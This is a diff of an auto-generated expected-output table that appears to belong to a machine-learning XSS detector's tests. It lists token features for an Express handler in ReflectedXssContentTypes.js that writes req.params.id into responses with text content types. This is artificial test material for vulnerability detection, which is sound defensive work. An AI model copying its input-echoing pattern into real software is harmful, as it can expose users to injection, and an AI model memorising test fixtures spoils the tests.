express | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:50:22:58:1 | exceptional return of anonymous function | contextFunctionInterfaces | textContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:50:22:58:1 | exceptional return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:50:22:58:1 | exceptional return of anonymous function | enclosingFunctionBody | req res err res header Content-Type textContentType res end FOO: req params id res setHeader Content-Type text/plain;charset=utf8 res end FOO: req params id | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:50:22:58:1 | exceptional return of anonymous function | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:50:22:58:1 | exceptional return of anonymous function | fileImports | express | | autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:50:22:58:1 | functio ... K\\n }\\n} | CalleeFlexibleAccessPath | app.get | | autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:50:22:58:1 | functio ... K\\n }\\n} | InputArgumentIndex | 1 | | autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:50:22:58:1 | functio ... K\\n }\\n} | calleeImports | express | @@ -20538,6 +136608,61 @@ tokenFeatures | autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:50:22:58:1 | functio ... K\\n }\\n} | contextSurroundingFunctionParameters | (req, res) | | autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:50:22:58:1 | functio ... K\\n }\\n} | fileImports | express | | autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:50:22:58:1 | functio ... K\\n }\\n} | receiverName | app | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:50:22:58:1 | return of anonymous function | contextFunctionInterfaces | textContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:50:22:58:1 | return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:50:22:58:1 | return of anonymous function | enclosingFunctionBody | req res err res header Content-Type textContentType res end FOO: req params id res setHeader Content-Type text/plain;charset=utf8 res end FOO: req params id | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:50:22:58:1 | return of anonymous function | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:50:22:58:1 | return of anonymous function | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:50:32:50:34 | req | contextFunctionInterfaces | textContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:50:32:50:34 | req | contextFunctionInterfaces | textContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:50:32:50:34 | req | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:50:32:50:34 | req | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:50:32:50:34 | req | enclosingFunctionBody | req res err res header Content-Type textContentType res end FOO: req params id res setHeader Content-Type text/plain;charset=utf8 res end FOO: req params id | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:50:32:50:34 | req | enclosingFunctionBody | req res err res header Content-Type textContentType res end FOO: req params id res setHeader Content-Type text/plain;charset=utf8 res end FOO: req params id | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:50:32:50:34 | req | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:50:32:50:34 | req | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:50:32:50:34 | req | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:50:32:50:34 | req | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:50:37:50:39 | res | contextFunctionInterfaces | textContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:50:37:50:39 | res | contextFunctionInterfaces | textContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:50:37:50:39 | res | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:50:37:50:39 | res | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:50:37:50:39 | res | enclosingFunctionBody | req res err res header Content-Type textContentType res end FOO: req params id res setHeader Content-Type text/plain;charset=utf8 res end FOO: req params id | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:50:37:50:39 | res | enclosingFunctionBody | req res err res header Content-Type textContentType res end FOO: req params id res setHeader Content-Type text/plain;charset=utf8 res end FOO: req params id | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:50:37:50:39 | res | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:50:37:50:39 | res | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:50:37:50:39 | res | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:50:37:50:39 | res | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:51:7:51:9 | err | contextFunctionInterfaces | textContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:51:7:51:9 | err | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:51:7:51:9 | err | enclosingFunctionBody | req res err res header Content-Type textContentType res end FOO: req params id res setHeader Content-Type text/plain;charset=utf8 res end FOO: req params id | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:51:7:51:9 | err | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:51:7:51:9 | err | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:52:5:52:7 | res | contextFunctionInterfaces | textContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:52:5:52:7 | res | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:52:5:52:7 | res | enclosingFunctionBody | req res err res header Content-Type textContentType res end FOO: req params id res setHeader Content-Type text/plain;charset=utf8 res end FOO: req params id | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:52:5:52:7 | res | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:52:5:52:7 | res | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:52:5:52:14 | res.header | contextFunctionInterfaces | textContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:52:5:52:14 | res.header | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:52:5:52:14 | res.header | enclosingFunctionBody | req res err res header Content-Type textContentType res end FOO: req params id res setHeader Content-Type text/plain;charset=utf8 res end FOO: req params id | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:52:5:52:14 | res.header | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:52:5:52:14 | res.header | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:52:5:52:51 | exceptional return of res.hea ... ype()}) | contextFunctionInterfaces | textContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:52:5:52:51 | exceptional return of res.hea ... ype()}) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:52:5:52:51 | exceptional return of res.hea ... ype()}) | enclosingFunctionBody | req res err res header Content-Type textContentType res end FOO: req params id res setHeader Content-Type text/plain;charset=utf8 res end FOO: req params id | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:52:5:52:51 | exceptional return of res.hea ... ype()}) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:52:5:52:51 | exceptional return of res.hea ... ype()}) | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:52:5:52:51 | res.hea ... ype()}) | contextFunctionInterfaces | textContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:52:5:52:51 | res.hea ... ype()}) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:52:5:52:51 | res.hea ... ype()}) | enclosingFunctionBody | req res err res header Content-Type textContentType res end FOO: req params id res setHeader Content-Type text/plain;charset=utf8 res end FOO: req params id | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:52:5:52:51 | res.hea ... ype()}) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:52:5:52:51 | res.hea ... ype()}) | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:52:9:52:14 | header | contextFunctionInterfaces | textContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:52:9:52:14 | header | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:52:9:52:14 | header | enclosingFunctionBody | req res err res header Content-Type textContentType res end FOO: req params id res setHeader Content-Type text/plain;charset=utf8 res end FOO: req params id | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:52:9:52:14 | header | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:52:9:52:14 | header | fileImports | express | | autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:52:16:52:50 | {'Conte ... Type()} | CalleeFlexibleAccessPath | res.header | | autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:52:16:52:50 | {'Conte ... Type()} | InputArgumentIndex | 0 | | autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:52:16:52:50 | {'Conte ... Type()} | contextFunctionInterfaces | textContentType() | @@ -20546,6 +136671,31 @@ tokenFeatures | autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:52:16:52:50 | {'Conte ... Type()} | enclosingFunctionName | app.get#functionalargument | | autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:52:16:52:50 | {'Conte ... Type()} | fileImports | express | | autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:52:16:52:50 | {'Conte ... Type()} | receiverName | res | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:52:17:52:30 | 'Content-Type' | contextFunctionInterfaces | textContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:52:17:52:30 | 'Content-Type' | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:52:17:52:30 | 'Content-Type' | enclosingFunctionBody | req res err res header Content-Type textContentType res end FOO: req params id res setHeader Content-Type text/plain;charset=utf8 res end FOO: req params id | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:52:17:52:30 | 'Content-Type' | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:52:17:52:30 | 'Content-Type' | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:52:17:52:49 | 'Conten ... tType() | contextFunctionInterfaces | textContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:52:17:52:49 | 'Conten ... tType() | contextFunctionInterfaces | textContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:52:17:52:49 | 'Conten ... tType() | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:52:17:52:49 | 'Conten ... tType() | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:52:17:52:49 | 'Conten ... tType() | enclosingFunctionBody | req res err res header Content-Type textContentType res end FOO: req params id res setHeader Content-Type text/plain;charset=utf8 res end FOO: req params id | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:52:17:52:49 | 'Conten ... tType() | enclosingFunctionBody | req res err res header Content-Type textContentType res end FOO: req params id res setHeader Content-Type text/plain;charset=utf8 res end FOO: req params id | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:52:17:52:49 | 'Conten ... tType() | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:52:17:52:49 | 'Conten ... tType() | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:52:17:52:49 | 'Conten ... tType() | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:52:17:52:49 | 'Conten ... tType() | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:52:33:52:47 | textContentType | contextFunctionInterfaces | textContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:52:33:52:47 | textContentType | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:52:33:52:47 | textContentType | enclosingFunctionBody | req res err res header Content-Type textContentType res end FOO: req params id res setHeader Content-Type text/plain;charset=utf8 res end FOO: req params id | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:52:33:52:47 | textContentType | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:52:33:52:47 | textContentType | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:52:33:52:49 | exceptional return of textContentType() | contextFunctionInterfaces | textContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:52:33:52:49 | exceptional return of textContentType() | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:52:33:52:49 | exceptional return of textContentType() | enclosingFunctionBody | req res err res header Content-Type textContentType res end FOO: req params id res setHeader Content-Type text/plain;charset=utf8 res end FOO: req params id | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:52:33:52:49 | exceptional return of textContentType() | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:52:33:52:49 | exceptional return of textContentType() | fileImports | express | | autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:52:33:52:49 | textContentType() | CalleeFlexibleAccessPath | res.header | | autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:52:33:52:49 | textContentType() | InputAccessPathFromCallee | 0.Content-Type | | autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:52:33:52:49 | textContentType() | InputArgumentIndex | 0 | @@ -20555,6 +136705,37 @@ tokenFeatures | autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:52:33:52:49 | textContentType() | enclosingFunctionBody | req res err res header Content-Type textContentType res end FOO: req params id res setHeader Content-Type text/plain;charset=utf8 res end FOO: req params id | | autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:52:33:52:49 | textContentType() | enclosingFunctionName | app.get#functionalargument | | autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:52:33:52:49 | textContentType() | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:53:5:53:7 | res | contextFunctionInterfaces | textContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:53:5:53:7 | res | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:53:5:53:7 | res | enclosingFunctionBody | req res err res header Content-Type textContentType res end FOO: req params id res setHeader Content-Type text/plain;charset=utf8 res end FOO: req params id | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:53:5:53:7 | res | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:53:5:53:7 | res | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:53:5:53:11 | res.end | contextFunctionInterfaces | textContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:53:5:53:11 | res.end | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:53:5:53:11 | res.end | enclosingFunctionBody | req res err res header Content-Type textContentType res end FOO: req params id res setHeader Content-Type text/plain;charset=utf8 res end FOO: req params id | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:53:5:53:11 | res.end | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:53:5:53:11 | res.end | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:53:5:53:36 | exceptional return of res.end ... ams.id) | contextFunctionInterfaces | textContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:53:5:53:36 | exceptional return of res.end ... ams.id) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:53:5:53:36 | exceptional return of res.end ... ams.id) | enclosingFunctionBody | req res err res header Content-Type textContentType res end FOO: req params id res setHeader Content-Type text/plain;charset=utf8 res end FOO: req params id | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:53:5:53:36 | exceptional return of res.end ... ams.id) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:53:5:53:36 | exceptional return of res.end ... ams.id) | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:53:5:53:36 | res.end ... ams.id) | contextFunctionInterfaces | textContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:53:5:53:36 | res.end ... ams.id) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:53:5:53:36 | res.end ... ams.id) | enclosingFunctionBody | req res err res header Content-Type textContentType res end FOO: req params id res setHeader Content-Type text/plain;charset=utf8 res end FOO: req params id | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:53:5:53:36 | res.end ... ams.id) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:53:5:53:36 | res.end ... ams.id) | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:53:9:53:11 | end | contextFunctionInterfaces | textContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:53:9:53:11 | end | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:53:9:53:11 | end | enclosingFunctionBody | req res err res header Content-Type textContentType res end FOO: req params id res setHeader Content-Type text/plain;charset=utf8 res end FOO: req params id | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:53:9:53:11 | end | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:53:9:53:11 | end | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:53:13:53:19 | "FOO: " | contextFunctionInterfaces | textContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:53:13:53:19 | "FOO: " | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:53:13:53:19 | "FOO: " | enclosingFunctionBody | req res err res header Content-Type textContentType res end FOO: req params id res setHeader Content-Type text/plain;charset=utf8 res end FOO: req params id | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:53:13:53:19 | "FOO: " | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:53:13:53:19 | "FOO: " | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:53:13:53:19 | "FOO: " | stringConcatenatedWith | -endpoint- req.params.id | | autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:53:13:53:35 | "FOO: " ... rams.id | CalleeFlexibleAccessPath | res.end | | autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:53:13:53:35 | "FOO: " ... rams.id | InputArgumentIndex | 0 | | autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:53:13:53:35 | "FOO: " ... rams.id | contextFunctionInterfaces | textContentType() | @@ -20563,6 +136744,57 @@ tokenFeatures | autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:53:13:53:35 | "FOO: " ... rams.id | enclosingFunctionName | app.get#functionalargument | | autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:53:13:53:35 | "FOO: " ... rams.id | fileImports | express | | autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:53:13:53:35 | "FOO: " ... rams.id | receiverName | res | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:53:23:53:25 | req | contextFunctionInterfaces | textContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:53:23:53:25 | req | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:53:23:53:25 | req | enclosingFunctionBody | req res err res header Content-Type textContentType res end FOO: req params id res setHeader Content-Type text/plain;charset=utf8 res end FOO: req params id | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:53:23:53:25 | req | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:53:23:53:25 | req | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:53:23:53:32 | req.params | contextFunctionInterfaces | textContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:53:23:53:32 | req.params | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:53:23:53:32 | req.params | enclosingFunctionBody | req res err res header Content-Type textContentType res end FOO: req params id res setHeader Content-Type text/plain;charset=utf8 res end FOO: req params id | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:53:23:53:32 | req.params | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:53:23:53:32 | req.params | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:53:23:53:35 | req.params.id | contextFunctionInterfaces | textContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:53:23:53:35 | req.params.id | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:53:23:53:35 | req.params.id | enclosingFunctionBody | req res err res header Content-Type textContentType res end FOO: req params id res setHeader Content-Type text/plain;charset=utf8 res end FOO: req params id | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:53:23:53:35 | req.params.id | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:53:23:53:35 | req.params.id | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:53:23:53:35 | req.params.id | stringConcatenatedWith | 'FOO: ' -endpoint- | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:53:27:53:32 | params | contextFunctionInterfaces | textContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:53:27:53:32 | params | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:53:27:53:32 | params | enclosingFunctionBody | req res err res header Content-Type textContentType res end FOO: req params id res setHeader Content-Type text/plain;charset=utf8 res end FOO: req params id | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:53:27:53:32 | params | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:53:27:53:32 | params | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:53:34:53:35 | id | contextFunctionInterfaces | textContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:53:34:53:35 | id | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:53:34:53:35 | id | enclosingFunctionBody | req res err res header Content-Type textContentType res end FOO: req params id res setHeader Content-Type text/plain;charset=utf8 res end FOO: req params id | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:53:34:53:35 | id | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:53:34:53:35 | id | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:55:5:55:7 | res | contextFunctionInterfaces | textContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:55:5:55:7 | res | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:55:5:55:7 | res | enclosingFunctionBody | req res err res header Content-Type textContentType res end FOO: req params id res setHeader Content-Type text/plain;charset=utf8 res end FOO: req params id | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:55:5:55:7 | res | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:55:5:55:7 | res | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:55:5:55:17 | res.setHeader | contextFunctionInterfaces | textContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:55:5:55:17 | res.setHeader | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:55:5:55:17 | res.setHeader | enclosingFunctionBody | req res err res header Content-Type textContentType res end FOO: req params id res setHeader Content-Type text/plain;charset=utf8 res end FOO: req params id | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:55:5:55:17 | res.setHeader | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:55:5:55:17 | res.setHeader | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:55:5:55:60 | exceptional return of res.set ... =utf8') | contextFunctionInterfaces | textContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:55:5:55:60 | exceptional return of res.set ... =utf8') | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:55:5:55:60 | exceptional return of res.set ... =utf8') | enclosingFunctionBody | req res err res header Content-Type textContentType res end FOO: req params id res setHeader Content-Type text/plain;charset=utf8 res end FOO: req params id | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:55:5:55:60 | exceptional return of res.set ... =utf8') | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:55:5:55:60 | exceptional return of res.set ... =utf8') | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:55:5:55:60 | res.set ... =utf8') | contextFunctionInterfaces | textContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:55:5:55:60 | res.set ... =utf8') | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:55:5:55:60 | res.set ... =utf8') | enclosingFunctionBody | req res err res header Content-Type textContentType res end FOO: req params id res setHeader Content-Type text/plain;charset=utf8 res end FOO: req params id | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:55:5:55:60 | res.set ... =utf8') | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:55:5:55:60 | res.set ... =utf8') | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:55:9:55:17 | setHeader | contextFunctionInterfaces | textContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:55:9:55:17 | setHeader | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:55:9:55:17 | setHeader | enclosingFunctionBody | req res err res header Content-Type textContentType res end FOO: req params id res setHeader Content-Type text/plain;charset=utf8 res end FOO: req params id | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:55:9:55:17 | setHeader | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:55:9:55:17 | setHeader | fileImports | express | | autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:55:19:55:32 | 'Content-Type' | CalleeFlexibleAccessPath | res.setHeader | | autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:55:19:55:32 | 'Content-Type' | InputArgumentIndex | 0 | | autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:55:19:55:32 | 'Content-Type' | contextFunctionInterfaces | textContentType() | @@ -20579,6 +136811,37 @@ tokenFeatures | autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:55:35:55:59 | 'text/p ... t=utf8' | enclosingFunctionName | app.get#functionalargument | | autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:55:35:55:59 | 'text/p ... t=utf8' | fileImports | express | | 